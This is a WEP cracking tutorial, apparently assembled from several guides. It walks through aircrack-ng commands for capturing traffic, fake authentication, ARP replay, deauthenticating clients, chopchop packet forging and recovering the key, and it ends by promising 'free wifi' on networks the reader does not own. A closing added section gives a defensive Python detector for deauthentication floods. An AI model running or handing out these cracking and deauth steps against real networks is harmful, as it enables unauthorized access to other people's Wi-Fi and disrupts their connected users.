INJECTION SUPPORT
aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 rausb0
ARP
aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
AGGRESSIVE
aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 rausb0
NOTE: To open a terminal press Ctrl+Alt+T, or use the black square icon next to the "start menu".
In a terminal type:
airmon-ng start wifi0
then:
airodump-ng ath1
when you find your wifi network, press Ctrl+C to stop the scan and type
airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1
where (do not type the brackets):
[channel] is the channel
[AP MAC] is the MAC address, XX:XX:XX:XX:XX:XX
[filename] is the file name you want to give it, for example "casa"; remember it.
STEP 2:
Open a new terminal, you already know how...
aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
where:
[AP SSID] is the name of the access point, for example WLANCASA or whatever shows up in the first terminal.
If you see this, congratulations:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
If not, try the following:
aireplay-ng --fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1
And you should get something like this:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
STEP 3:
aireplay-ng -3 -b [AP MAC] ath1 -x 250
Wait until the data count reaches roughly 40,000 and open a third terminal.
STEP 4:
aircrack-ng -z -b [AP MAC] [filename*.cap]
For filename put what I told you earlier; in your case it would be casa.cap or whatever name you chose.
Wait a little longer and the key will appear; write it down on a piece of paper and you're done. Reboot into your favourite OS and enjoy your free wifi.
METHOD 1 WITH CLIENTS
aireplay-ng [wireless interface] --arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found with airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] --deauth 10 -a [the client's MAC address]
3. Wait a long time, approximately 10 minutes. You should see the data field in airodump rising. If you have around 500k of data, go to the cracking step of this tutorial.
METHOD 2 WITHOUT CLIENTS
1. Open a new terminal window and type in (do NOT press the enter button!)
aireplay-ng [wireless interface] --arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found with airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (do NOT press the enter button!):
aireplay-ng [wireless interface] --fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06
3. Press enter in the fakeauth terminal and, once it has started the fake authentication, press enter as quickly as possible in the arpreplay window.
4. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] --deauth 10 -a 01:02:03:04:05:06
5. Wait a long time, approximately 10 minutes. You should see the data field in airodump rising. If you have around 500k of data, go to the cracking step of this tutorial.
IF THIS DOESN'T WORK, TRY
1. Open a new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] --fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] --chopchop -e [the SSID which you found with airodump] -b [the BSSID you found with airodump] -h 01:02:03:04:05:06
3. The chopchop attack starts reading packets. When it finds one, it'll ask whether to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.
4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)
5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.
6. open a terminal and type in (press enter after typing in):
arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found with airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap
7. In a new or in the same terminal window, type in (and press enter):
aireplay-ng -2 ath0 -r arp.cap
8. Wait a long time, approximately 10 minutes. You should see the data field in airodump rising. If you have around 500k of data, go to the cracking step of this tutorial.
aircrack-ng -n 64 capture-01.ivs (for 64-bit encryption, press enter after typing)
or
aircrack-ng -n 128 capture-01.ivs (for 128-bit encryption, press enter after typing)
If you don't know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this command:
aircrack-ng capture-01.ivs
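As an added example that is not part of this tutorial, here is the defender-side counterpart to the --deauth step used in every method above: a Python detector that decodes raw 802.11 management frame headers and flags a transmitter that emits a burst of deauthentication/disassociation frames. The sample frames are constructed inline from the page's placeholder MACs (AP 00:01:02:03:04:05, client 00:04:05:06:07:08); the window and threshold values are assumptions to tune per site.

```python
# Added example, not from the original tutorial: flag deauth/disassoc floods
# (what `aireplay-ng --deauth` above puts on the air) from raw 802.11 frames.
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A   # 802.11 management subtypes (frame type 0)

def mac_str(raw: bytes) -> str:
    return ':'.join(f'{b:02x}' for b in raw)

def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:                      # 0 = management; data/control frames are skipped
        return None
    a1, a2, a3 = mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack('<H', frame[24:26])[0]   # reason code, little-endian
    return subtype, a1, a2, a3, reason

def find_deauth_floods(frames, window=2.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes). Returns
    {transmitter_mac: peak_count} for transmitters sending more than `threshold`
    deauth/disassoc frames within any `window` seconds. The transmitter address
    is forged to look like the AP, so the rate, not the address, is the signal."""
    recent, flagged = defaultdict(deque), {}
    for ts, frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        src = parsed[2]
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) > threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged

# Constructed sample traffic (tutorial placeholder MACs). Deauth header layout:
# FC c0 00, duration, addr1=client, addr2=AP, addr3=AP, seq ctrl, reason 7.
DEAUTH_FRAME = bytes.fromhex('c0000000' '000405060708' '000102030405' '000102030405' '1000' '0700')
BEACON_FRAME = bytes.fromhex('80000000' 'ffffffffffff' '000102030405' '000102030405' '2000') + bytes(12)
SAMPLE = [(0.0, BEACON_FRAME), (0.5, DEAUTH_FRAME)]             # a single, ordinary deauth
SAMPLE += [(10.0 + i * 0.1, DEAUTH_FRAME) for i in range(8)]    # 8 deauths inside 0.7 s
```

Run on a real capture, feed it (timestamp, frame) pairs from a monitor-mode pcap; 802.11w management frame protection is the mitigation that makes such forged deauth frames ineffective against your own clients.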